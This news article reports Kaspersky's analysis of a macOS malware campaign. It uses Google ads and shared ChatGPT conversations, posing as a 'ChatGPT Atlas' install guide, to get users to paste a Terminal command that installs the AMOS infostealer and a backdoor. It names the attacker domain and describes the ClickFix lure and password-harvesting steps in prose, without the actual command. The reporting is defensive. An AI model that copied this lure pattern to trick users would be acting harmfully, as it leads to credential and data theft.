Kaspersky has uncovered a new macOS malware campaign that uses paid Google search ads and ChatGPT’s chat-sharing feature to spread the AMOS (Atomic macOS Stealer) infostealer. The operation targets Mac users searching for tools such as “chatgpt atlas”, directing them to a page that appears to offer installation instructions for an application named ChatGPT Atlas for macOS. The page is hosted on chatgpt.com and is presented as a legitimate installation guide, although it is actually a shared ChatGPT conversation manipulated to display only a set of step-by-step instructions designed to trick users into executing malicious code.
According to Kaspersky’s threat research team, the attackers rely on social engineering rather than exploiting system vulnerabilities. The guide asks users to copy a single command, paste it into Terminal, and grant all requested permissions. The command fetches and runs a script from an external domain, atlas-extension.com, which then initiates the rest of the infection chain.
Password harvesting and malware installation process
Kaspersky’s analysis shows that the downloaded script repeatedly prompts users for their system password. It checks whether the supplied password is correct by attempting to run system commands. Once validated, the script downloads the AMOS infostealer and uses the acquired credentials to install and launch it.
This pattern is part of a broader tactic known as the ClickFix technique, where users are persuaded to run commands manually, allowing attackers to avoid traditional security barriers. Once active, AMOS collects a wide range of data that can be monetised or used in later attacks. This includes passwords, cookies, and browser information, along with data from cryptocurrency wallets such as Electrum, Coinomi, and Exodus. It also targets applications including Telegram Desktop and OpenVPN Connect.
The malware goes on to search for TXT, PDF, and DOCX files in common user directories such as Desktop, Documents, and Downloads. It also seeks data stored by the built-in Notes app. All collected information is exfiltrated to attacker-controlled servers.
Persistent access and wider trend of AI-themed threats
Alongside AMOS, the script installs a persistent backdoor configured to launch automatically when the system restarts. The backdoor provides remote access to the compromised device and duplicates much of AMOS’s data-gathering behaviour, extending the attacker’s control and visibility beyond the initial breach.
Kaspersky notes that this campaign reflects a wider rise in infostealer activity in 2025. Threat actors have increasingly leveraged AI-related themes and tools to lend credibility to their scams. Recent tactics have included fake AI browser extensions and counterfeit clients for popular AI models. The Atlas-themed operation continues this trend by misusing the chat-sharing feature of a legitimate AI platform to create convincing malicious pages.
Vladimir Gursky, Malware Analyst at Kaspersky, said the success of this campaign stems from how familiar elements are used to lower users’ guard. “What makes this case effective is not a sophisticated exploit, but the way social engineering is wrapped in a familiar AI context,” he said. “A sponsored link leads to a well-formatted page on a trusted domain, and the ‘installation guide’ is just a single Terminal command. For many users, that combination of trust and simplicity is enough to bypass their usual caution, yet the result is full compromise of the system and long-term access for the attacker.”
The company advises users to be cautious of any unsolicited guides that instruct them to run Terminal or PowerShell commands, particularly if they involve copying a single script from a web page or chat. Users should also close suspicious pages, seek expert advice when uncertain, and consider using AI or security tools to analyse unfamiliar commands before execution. Kaspersky further recommends installing reputable security software on all devices, including macOS and Linux systems, to block infostealers and related threats.
